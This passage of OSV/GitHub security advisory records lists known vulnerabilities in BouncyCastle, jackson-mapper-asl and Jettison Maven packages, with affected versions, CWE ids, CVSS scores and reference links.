"GHSA-wrwf-pmmj-w989", "published": "2022-05-13T01:14:24Z", "modified": "2023-11-08T03:58:54.947561Z", "aliases": [ "CVE-2017-13098" ], "summary": "Observable Discrepancy in BouncyCastle", "details": "BouncyCastle TLS prior to version 1.0.3, when configured to use the JCE (Java Cryptography Extension) for cryptographic functions, provides a weak Bleichenbacher oracle when any TLS cipher suite using RSA key exchange is negotiated. An attacker can recover the private key from a vulnerable application. This vulnerability is referred to as \"ROBOT.\"", "affected": [ { "package": { "name": "org.bouncycastle:bcprov-jdk15on", "ecosystem": "Maven", "purl": "pkg:maven/org.bouncycastle/bcprov-jdk15on" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "1.0.3" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/05/GHSA-wrwf-pmmj-w989/GHSA-wrwf-pmmj-w989.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2017-13098" }, { "type": "WEB", "url": "https://github.com/bcgit/bc-java/commit/a00b684465b38d722ca9a3543b8af8568e6bad5c" }, { "type": "PACKAGE", "url": "https://github.com/bcgit/bc-java" }, { "type": "WEB", "url": "https://robotattack.org" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20171222-0001" }, { "type": "WEB", "url": "https://www.debian.org/security/2017/dsa-4072" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuoct2020.html" }, { "type": "WEB", "url": "http://lists.opensuse.org/opensuse-security-announce/2020-05/msg00011.html" }, { "type": "WEB", "url": "http://www.kb.cert.org/vuls/id/144389" } ], "database_specific": { "cwe_ids": [ "CWE-203" ], "github_reviewed": true, "github_reviewed_at": "2022-07-01T20:14:25Z", "nvd_published_at": "2017-12-13T01:29:00Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-xqj7-j8j5-f2xr", "published": "2018-10-16T17:44:39Z", "modified": "2025-09-12T20:04:13.290612Z", "aliases": [ "CVE-2018-1000180" ], "summary": "Bouncy Castle has a flaw in the Low-level interface to RSA key pair generator", "details": "Bouncy Castle BC 1.54 - 1.59, BC-FJA 1.0.0, BC-FJA 1.0.1 and earlier have a flaw in the Low-level interface to RSA key pair generator, specifically RSA Key Pairs generated in low-level API with added certainty may have less M-R tests than expected. This appears to be fixed in versions BC 1.60 beta 4 and later, BC-FJA 1.0.2 and later.", "affected": [ { "package": { "name": "org.bouncycastle:bcprov-jdk14", "ecosystem": "Maven", "purl": "pkg:maven/org.bouncycastle/bcprov-jdk14" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "1.60" } ] } ], "versions": [ "1.38", "1.43", "1.44", "1.45", "1.46", "1.47", "1.48", "1.49", "1.50", "1.51", "1.53", "1.54", "1.55", "1.56", "1.57", "1.58", "1.59" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2018/10/GHSA-xqj7-j8j5-f2xr/GHSA-xqj7-j8j5-f2xr.json" } }, { "package": { "name": "org.bouncycastle:bcprov-jdk15", "ecosystem": "Maven", "purl": "pkg:maven/org.bouncycastle/bcprov-jdk15" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "1.60" } ] } ], "versions": [ "1.32", "1.38", "1.40", "1.43", "1.44", "1.45", "1.46" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2018/10/GHSA-xqj7-j8j5-f2xr/GHSA-xqj7-j8j5-f2xr.json" } }, { "package": { "name": "org.bouncycastle:bcprov-jdk15on", "ecosystem": "Maven", "purl": "pkg:maven/org.bouncycastle/bcprov-jdk15on" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "1.60" } ] } ], "versions": [ "1.46", "1.47", "1.48", "1.49", "1.50", "1.51", "1.52", "1.53", "1.54", "1.55", "1.56", "1.57", "1.58", "1.59" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2018/10/GHSA-xqj7-j8j5-f2xr/GHSA-xqj7-j8j5-f2xr.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-1000180" }, { "type": "WEB", "url": "https://github.com/bcgit/bc-java/commit/22467b6e8fe19717ecdf201c0cf91bacf04a55ad" }, { "type": "WEB", "url": "https://github.com/bcgit/bc-java/commit/73780ac522b7795fc165630aba8d5f5729acc839" }, { "type": "WEB", "url": "https://www.oracle.com/technetwork/security-advisory/cpujul2019-5072835.html" }, { "type": "WEB", "url": "https://www.oracle.com/technetwork/security-advisory/cpujan2019-5072801.html" }, { "type": "WEB", "url": "https://www.oracle.com/technetwork/security-advisory/cpuapr2019-5072813.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuoct2020.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuapr2020.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuApr2021.html" }, { "type": "WEB", "url": "https://www.debian.org/security/2018/dsa-4233" }, { "type": "WEB", "url": "https://www.bountysource.com/issues/58293083-rsa-key-generation-computation-of-iterations-for-mr-primality-test" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20190204-0003" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/708d94141126eac03011144a971a6411fcac16d9c248d1d535a39451@%3Csolr-user.lucene.apache.org%3E" }, { "type": "WEB", "url": "https://github.com/bcgit/bc-java/wiki/CVE-2018-1000180" }, { "type": "ADVISORY", "url": "https://github.com/advisories/GHSA-xqj7-j8j5-f2xr" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:0877" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2018:2669" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2018:2643" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2018:2428" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2018:2425" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2018:2424" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2018:2423" }, { "type": "WEB", "url": "http://www.securityfocus.com/bid/106567" } ], "database_specific": { "cwe_ids": [ "CWE-327" ], "github_reviewed": true, "github_reviewed_at": "2020-06-16T22:04:14Z", "nvd_published_at": "2018-06-05T13:29:00Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-c27h-mcmw-48hv", "published": "2022-05-24T16:57:28Z", "modified": "2024-03-11T05:32:32.879730Z", "aliases": [ "CVE-2019-10202" ], "related": [ "CGA-2267-f6h9-4h4p", "CGA-2v7f-j393-2r48", "CGA-5q42-fr7m-wmqh", "CGA-g9g4-vq86-q338" ], "summary": "Deserialization of Untrusted Data in org.codehaus.jackson:jackson-mapper-asl", "details": "A series of deserialization vulnerabilities have been discovered in Codehaus 1.9.x implemented in EAP 7. This CVE fixes CVE-2017-17485, CVE-2017-7525, CVE-2017-15095, CVE-2018-5968, CVE-2018-7489, CVE-2018-1000873, CVE-2019-12086 reported for FasterXML jackson-databind by implementing a whitelist approach that will mitigate these vulnerabilities and future ones alike.", "affected": [ { "package": { "name": "org.codehaus.jackson:jackson-mapper-asl", "ecosystem": "Maven", "purl": "pkg:maven/org.codehaus.jackson/jackson-mapper-asl" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "last_affected": "1.9.13" } ] } ], "versions": [ "0.9.6", "0.9.7", "0.9.8", "0.9.9", "0.9.9-2", "0.9.9-3", "0.9.9-4", "0.9.9-5", "0.9.9-6", "1.0.0", "1.0.1", "1.1.0", "1.1.1", "1.1.2", "1.2.0", "1.2.1", "1.3.0", "1.3.1", "1.3.2", "1.3.3", "1.3.4", "1.3.5", "1.4.0", "1.4.1", "1.4.2", "1.4.3", "1.4.4", "1.4.5", "1.5.0", "1.5.1", "1.5.2", "1.5.3", "1.5.4", "1.5.5", "1.5.6", "1.5.7", "1.5.8", "1.6.0", "1.6.1", "1.6.2", "1.6.3", "1.6.4", "1.6.5", "1.6.6", "1.6.7", "1.6.9", "1.7.0", "1.7.1", "1.7.2", "1.7.3", "1.7.4", "1.7.5", "1.7.6", "1.7.7", "1.7.8", "1.7.9", "1.8.0", "1.8.1", "1.8.10", "1.8.11", "1.8.2", "1.8.3", "1.8.4", "1.8.5", "1.8.6", "1.8.7", "1.8.8", "1.8.9", "1.9.0", "1.9.1", "1.9.10", "1.9.11", "1.9.12", "1.9.13", "1.9.2", "1.9.3", "1.9.4", "1.9.5", "1.9.6", "1.9.7", "1.9.8", "1.9.9" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/05/GHSA-c27h-mcmw-48hv/GHSA-c27h-mcmw-48hv.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-10202" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/refea6018a2c4e9eb7838cab567ed219c3f726dcd83a5472fbb80d8d9@%3Cissues.flume.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/refea6018a2c4e9eb7838cab567ed219c3f726dcd83a5472fbb80d8d9%40%3Cissues.flume.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rce00a1c60f7df4b10e72fa87827c102f55b074bb91993631df2c21f9@%3Cdev.hive.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rce00a1c60f7df4b10e72fa87827c102f55b074bb91993631df2c21f9%40%3Cdev.hive.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r6dea2a887f5eb1d68f124d64b14cd1a04f682f06de8cd01b7e4214e0@%3Cissues.hive.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r6dea2a887f5eb1d68f124d64b14cd1a04f682f06de8cd01b7e4214e0%40%3Cissues.hive.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r5f16a1bd31a7e94ca78eda686179930781aa3a4a990cd55986703581@%3Cdev.hive.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r5f16a1bd31a7e94ca78eda686179930781aa3a4a990cd55986703581%40%3Cdev.hive.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r500867b74f42230a3d65b8aec31fc93ac390eeae737c91a759ab94cb@%3Cissues.hive.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r500867b74f42230a3d65b8aec31fc93ac390eeae737c91a759ab94cb%40%3Cissues.hive.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r356592d9874ab4bc9da4754592f8aa6edc894c95e17e58484bc2af7a@%3Cissues.hive.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r356592d9874ab4bc9da4754592f8aa6edc894c95e17e58484bc2af7a%40%3Cissues.hive.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r1edabcfacdad42d3c830464e9cf07a9a489059a7b7a8642cf055542d@%3Cissues.hive.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r1edabcfacdad42d3c830464e9cf07a9a489059a7b7a8642cf055542d%40%3Cissues.hive.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r0fbf2c60967bc9f73d7f5a62ad3b955789f9a14b950f42e99fca9b4e@%3Cissues.hive.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r0fbf2c60967bc9f73d7f5a62ad3b955789f9a14b950f42e99fca9b4e%40%3Cissues.hive.apache.org%3E" }, { "type": "WEB", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2019-10202" } ], "database_specific": { "cwe_ids": [ "CWE-502" ], "github_reviewed": true, "github_reviewed_at": "2023-02-14T00:56:25Z", "nvd_published_at": "2019-10-01T15:15:00Z", "severity": "CRITICAL" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-r6j9-8759-g62w", "published": "2020-02-04T22:39:19Z", "modified": "2025-03-09T12:26:53.613046Z", "aliases": [ "CGA-6cwv-3jmj-96j9", "CVE-2019-10172" ], "related": [ "CGA-2wfh-9vp6-5hj5", "CGA-7pfp-wfcr-cm2m", "CGA-93w3-x4hw-7w7g", "CGA-cxxv-5q2j-64j3", "CGA-r6m9-c4ph-7jgx" ], "summary": "Improper Restriction of XML External Entity Reference in jackson-mapper-asl", "details": "A flaw was found in org.codehaus.jackson:jackson-mapper-asl:1.9.x libraries. XML external entity vulnerabilities similar to CVE-2016-3720 also affects codehaus jackson-mapper-asl libraries but in different classes.", "affected": [ { "package": { "name": "org.codehaus.jackson:jackson-mapper-asl", "ecosystem": "Maven", "purl": "pkg:maven/org.codehaus.jackson/jackson-mapper-asl" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "last_affected": "1.9.13" } ] } ], "versions": [ "0.9.6", "0.9.7", "0.9.8", "0.9.9", "0.9.9-2", "0.9.9-3", "0.9.9-4", "0.9.9-5", "0.9.9-6", "1.0.0", "1.0.1", "1.1.0", "1.1.1", "1.1.2", "1.2.0", "1.2.1", "1.3.0", "1.3.1", "1.3.2", "1.3.3", "1.3.4", "1.3.5", "1.4.0", "1.4.1", "1.4.2", "1.4.3", "1.4.4", "1.4.5", "1.5.0", "1.5.1", "1.5.2", "1.5.3", "1.5.4", "1.5.5", "1.5.6", "1.5.7", "1.5.8", "1.6.0", "1.6.1", "1.6.2", "1.6.3", "1.6.4", "1.6.5", "1.6.6", "1.6.7", "1.6.9", "1.7.0", "1.7.1", "1.7.2", "1.7.3", "1.7.4", "1.7.5", "1.7.6", "1.7.7", "1.7.8", "1.7.9", "1.8.0", "1.8.1", "1.8.10", "1.8.11", "1.8.2", "1.8.3", "1.8.4", "1.8.5", "1.8.6", "1.8.7", "1.8.8", "1.8.9", "1.9.0", "1.9.1", "1.9.10", "1.9.11", "1.9.12", "1.9.13", "1.9.2", "1.9.3", "1.9.4", "1.9.5", "1.9.6", "1.9.7", "1.9.8", "1.9.9" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/02/GHSA-r6j9-8759-g62w/GHSA-r6j9-8759-g62w.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-10172" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2020/08/msg00039.html" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/ra37700b842790883b9082e6b281fb7596f571b13078a4856cd38f2c2@%3Ccommits.cassandra.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/ra37700b842790883b9082e6b281fb7596f571b13078a4856cd38f2c2%40%3Ccommits.cassandra.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r80e8882c86c9c17a57396a5ef7c4f08878d629a0291243411be0de3a@%3Ccommits.cassandra.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r80e8882c86c9c17a57396a5ef7c4f08878d629a0291243411be0de3a%40%3Ccommits.cassandra.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r6dea2a887f5eb1d68f124d64b14cd1a04f682f06de8cd01b7e4214e0@%3Cissues.hive.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r6dea2a887f5eb1d68f124d64b14cd1a04f682f06de8cd01b7e4214e0%40%3Cissues.hive.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r68acf97f4526ba59a33cc6e592261ea4f85d890f99e79c82d57dd589@%3Cissues.spark.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r68acf97f4526ba59a33cc6e592261ea4f85d890f99e79c82d57dd589%40%3Cissues.spark.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r634468eb3218ab02713128ff6f4818c618622b2b3de4d958138dde49@%3Ccommits.cassandra.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r634468eb3218ab02713128ff6f4818c618622b2b3de4d958138dde49%40%3Ccommits.cassandra.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r5f16a1bd31a7e94ca78eda686179930781aa3a4a990cd55986703581@%3Cdev.hive.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r5f16a1bd31a7e94ca78eda686179930781aa3a4a990cd55986703581%40%3Cdev.hive.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r500867b74f42230a3d65b8aec31fc93ac390eeae737c91a759ab94cb@%3Cissues.hive.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r500867b74f42230a3d65b8aec31fc93ac390eeae737c91a759ab94cb%40%3Cissues.hive.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r4bbfa1439d7a4e1712e260bfc3d90f7cf997abfd641cccde6432d4ab@%3Ccommits.cassandra.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r4bbfa1439d7a4e1712e260bfc3d90f7cf997abfd641cccde6432d4ab%40%3Ccommits.cassandra.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r48a32f2dd6976d33f7a12b7e09ec7ea1895f8facba82b565587c28ac@%3Ccommon-issues.hadoop.apache.org%3E" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2020/01/msg00037.html" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/re646dcc2739d92117bf9a76a33c600ed3b65e8b4e9b6f441e366b72b@%3Ccommits.cassandra.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/re646dcc2739d92117bf9a76a33c600ed3b65e8b4e9b6f441e366b72b%40%3Ccommits.cassandra.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/re07c51a8026c11e6e5513bfdc66d52d1c1027053e480fb8073356257@%3Ccommits.cassandra.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/re07c51a8026c11e6e5513bfdc66d52d1c1027053e480fb8073356257%40%3Ccommits.cassandra.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rd3a34d663e2a25b9ab1e8a1a94712cd5f100f098578aec79af48161e@%3Ccommon-dev.hadoop.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rd3a34d663e2a25b9ab1e8a1a94712cd5f100f098578aec79af48161e%40%3Ccommon-dev.hadoop.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rd27730cfc3066dfcf15927c8e800603728d5dedf17eee1f8c6e3507c@%3Ccommon-issues.hadoop.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rd27730cfc3066dfcf15927c8e800603728d5dedf17eee1f8c6e3507c%40%3Ccommon-issues.hadoop.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rce00a1c60f7df4b10e72fa87827c102f55b074bb91993631df2c21f9@%3Cdev.hive.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rce00a1c60f7df4b10e72fa87827c102f55b074bb91993631df2c21f9%40%3Cdev.hive.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rb8c09b14fd57d855dc21e0a037dc29258c2cbe9c1966bfff453a02e4@%3Ccommon-issues.hadoop.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rb8c09b14fd57d855dc21e0a037dc29258c2cbe9c1966bfff453a02e4%40%3Ccommon-issues.hadoop.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rb47911c179c9f3e8ea3f134b5645e63cd20c6fc63bd0b43ab5864bd1@%3Ccommits.cassandra.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rb47911c179c9f3e8ea3f134b5645e63cd20c6fc63bd0b43ab5864bd1%40%3Ccommits.cassandra.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rb036bf32e4dacc49335e3bdc1be8e53d6f54df692ac8e2251a6884bd@%3Ccommon-issues.hadoop.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rb036bf32e4dacc49335e3bdc1be8e53d6f54df692ac8e2251a6884bd%40%3Ccommon-issues.hadoop.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r21ac3570ce865b8f1e5d26e492aeb714a6aaa53a0c9a6f72ef181556%40%3Ccommits.cassandra.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r1f07e61b3ebabd3e5b4aa97bf1b26d98b793fdfa29a23dac60633f55@%3Ccommon-issues.hadoop.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r1f07e61b3ebabd3e5b4aa97bf1b26d98b793fdfa29a23dac60633f55%40%3Ccommon-issues.hadoop.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r1edabcfacdad42d3c830464e9cf07a9a489059a7b7a8642cf055542d@%3Cissues.hive.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r1edabcfacdad42d3c830464e9cf07a9a489059a7b7a8642cf055542d%40%3Cissues.hive.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r1cc8bce2cf3dfce08a64c4fa20bf38d33b56ad995cee2e382f522f83@%3Ccommon-issues.hadoop.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r1cc8bce2cf3dfce08a64c4fa20bf38d33b56ad995cee2e382f522f83%40%3Ccommon-issues.hadoop.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r0fbf2c60967bc9f73d7f5a62ad3b955789f9a14b950f42e99fca9b4e@%3Cissues.hive.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r0fbf2c60967bc9f73d7f5a62ad3b955789f9a14b950f42e99fca9b4e%40%3Cissues.hive.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r0d8c3e32a0a2d8a0b6118f5b3487d363afdda80c996d7b930097383d@%3Ccommon-issues.hadoop.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r0d8c3e32a0a2d8a0b6118f5b3487d363afdda80c996d7b930097383d%40%3Ccommon-issues.hadoop.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r08e1b73fabd986dcd2ddd7d09480504d1472264bed2f19b1d2002a9c@%3Ccommon-issues.hadoop.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r08e1b73fabd986dcd2ddd7d09480504d1472264bed2f19b1d2002a9c%40%3Ccommon-issues.hadoop.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r04ecadefb27cda84b699130b11b96427f1d8a7a4066d8292f7f15ed8@%3Ccommon-issues.hadoop.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r04ecadefb27cda84b699130b11b96427f1d8a7a4066d8292f7f15ed8%40%3Ccommon-issues.hadoop.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r0066c1e862613de402fee04e81cbe00bcd64b64a2711beb9a13c3b25@%3Ccommits.cassandra.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r0066c1e862613de402fee04e81cbe00bcd64b64a2711beb9a13c3b25%40%3Ccommits.cassandra.apache.org%3E" }, { "type": "WEB", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2019-10172" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r48a32f2dd6976d33f7a12b7e09ec7ea1895f8facba82b565587c28ac%40%3Ccommon-issues.hadoop.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r43c6f75d203b8afc4fbd6c3200db0384a18a11c59d085b1a9bb0ccfe@%3Cuser.hadoop.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r43c6f75d203b8afc4fbd6c3200db0384a18a11c59d085b1a9bb0ccfe%40%3Cuser.hadoop.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r4176155240cdc36aad7869932d9c29551742c7fa630f209fb4a8e649@%3Ccommon-issues.hadoop.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r4176155240cdc36aad7869932d9c29551742c7fa630f209fb4a8e649%40%3Ccommon-issues.hadoop.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r386966780034aadee69ffd82d44555117c9339545b9ce990fe490a3e@%3Ccommits.cassandra.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r386966780034aadee69ffd82d44555117c9339545b9ce990fe490a3e%40%3Ccommits.cassandra.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r385c35a7c6f4acaacf37fe22922bb8e2aed9d322d0fa6dc1d45acddb@%3Ccommits.cassandra.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r385c35a7c6f4acaacf37fe22922bb8e2aed9d322d0fa6dc1d45acddb%40%3Ccommits.cassandra.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r37eb6579fa0bf94a72b6c978e2fee96f68a2b1b3ac1b1ce60aee86cf@%3Ccommits.cassandra.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r37eb6579fa0bf94a72b6c978e2fee96f68a2b1b3ac1b1ce60aee86cf%40%3Ccommits.cassandra.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r356592d9874ab4bc9da4754592f8aa6edc894c95e17e58484bc2af7a@%3Cissues.hive.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r356592d9874ab4bc9da4754592f8aa6edc894c95e17e58484bc2af7a%40%3Cissues.hive.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r33d25a342af84102903cd9dec8338a5bcba3ecfce10505bdfe793b92@%3Ccommon-issues.hadoop.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r33d25a342af84102903cd9dec8338a5bcba3ecfce10505bdfe793b92%40%3Ccommon-issues.hadoop.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r25e25973e9577c62fd0221b4b52990851adf11cbe33036bd67d4b13d@%3Ccommits.cassandra.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r25e25973e9577c62fd0221b4b52990851adf11cbe33036bd67d4b13d%40%3Ccommits.cassandra.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r21ac3570ce865b8f1e5d26e492aeb714a6aaa53a0c9a6f72ef181556@%3Ccommits.cassandra.apache.org%3E" } ], "database_specific": { "cwe_ids": [ "CWE-611" ], "github_reviewed": true, "github_reviewed_at": "2020-02-04T20:42:17Z", "nvd_published_at": "2019-11-18T17:15:00Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-56h3-78gp-v83r", "published": "2022-09-17T00:00:41Z", "modified": "2023-11-08T04:10:22.798161Z", "aliases": [ "CVE-2022-40149" ], "summary": "Jettison parser crash by stackoverflow", "details": "Those using Jettison to parse untrusted XML or JSON data may be vulnerable to Denial of Service attacks (DOS). If the parser is running on user supplied input, an attacker may supply content that causes the parser to crash by stackoverflow. This effect may support a denial of service attack.", "affected": [ { "package": { "name": "org.codehaus.jettison:jettison", "ecosystem": "Maven", "purl": "pkg:maven/org.codehaus.jettison/jettison" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "1.5.1" } ] } ], "versions": [ "1.0", "1.0-RC1", "1.0-RC2", "1.0-alpha-1", "1.0-beta-1", "1.0.1", "1.1", "1.2", "1.3", "1.3.1", "1.3.2", "1.3.3", "1.3.4", "1.3.5", "1.3.6", "1.3.7", "1.3.8", "1.4.0", "1.4.1", "1.5.0" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/09/GHSA-56h3-78gp-v83r/GHSA-56h3-78gp-v83r.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-40149" }, { "type": "WEB", "url": "https://github.com/jettison-json/jettison/issues/45" }, { "type": "WEB", "url": "https://github.com/jettison-json/jettison/pull/49/files" }, { "type": "WEB", "url": "https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=46538" }, { "type": "PACKAGE", "url": "https://github.com/jettison-json/jettison" }, { "type": "WEB", "url": "https://github.com/jettison-json/jettison/releases/tag/jettison-1.5.1" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2022/11/msg00011.html" }, { "type": "WEB", "url": "https://www.debian.org/security/2023/dsa-5312" } ], "database_specific": { "cwe_ids": [ "CWE-121", "CWE-787" ], "github_reviewed": true, 